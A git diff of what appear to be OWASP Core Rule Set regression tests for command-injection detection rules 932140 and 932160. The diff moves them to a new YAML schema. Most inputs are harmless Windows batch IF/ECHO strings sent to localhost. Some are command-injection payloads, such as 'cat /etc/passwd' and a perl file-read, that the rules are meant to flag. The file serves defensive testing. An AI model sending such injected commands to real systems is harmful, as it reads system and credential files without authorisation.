[932140] + - test_id: 97 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + 
User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 98 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 99 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 100 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 101 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 102 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 103 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 104 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%282+equ+2%29+echo+hey" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 105 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 106 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 107 + desc: imported test + stages: 
+ - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 108 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 109 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 110 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 111 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 112 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 113 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 114 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 115 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..." 
+ version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 116 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..." + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 117 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..." + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 118 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..." 
+ version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 119 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+DEFINED+BAR+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 120 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 121 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 122 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 123 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 124 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 125 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 126 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 127 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 128 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS 
test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 129 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 130 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 131 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 132 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 133 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 134 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 135 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 136 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 137 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" + version: HTTP/1.0 + output: + log: + 
expect_ids: [932140] + - test_id: 138 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 139 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 140 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 141 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%251+%3D%3D+%22%22+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 142 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + 
uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 143 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 144 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 145 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 146 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 147 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 148 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if%2Fi+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 149 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 150 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 151 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 152 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 153 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 154 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=ifq+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 155 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=iffoo+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 156 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 157 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3q+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 158 desc: | FP when using `t:urlDecodeUni`. Using `t:urlDecodeUni` removes the `+` from the encoded value in the XML document, which produced a false positive match. See https://github.com/coreruleset/coreruleset/issues/1785 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: if+foo== - output: - no_log_contains: id "932140" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: if+foo== + output: + log: + no_expect_ids: [932140] 
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml index 300ea3657..c2a0a6344 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml 
@@ -1,236 +1,234 @@ --- meta: author: "Paul Beckett, Esad Cetiner, azurit" - enabled: true - name: "932160.yaml" - description: "Tests to trigger or not trigger rule 932160" +rule_id: 932160 tests: - - test_title: 932160-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932160-1=cat%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932160-1=cat%20/etc/passwd" + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + 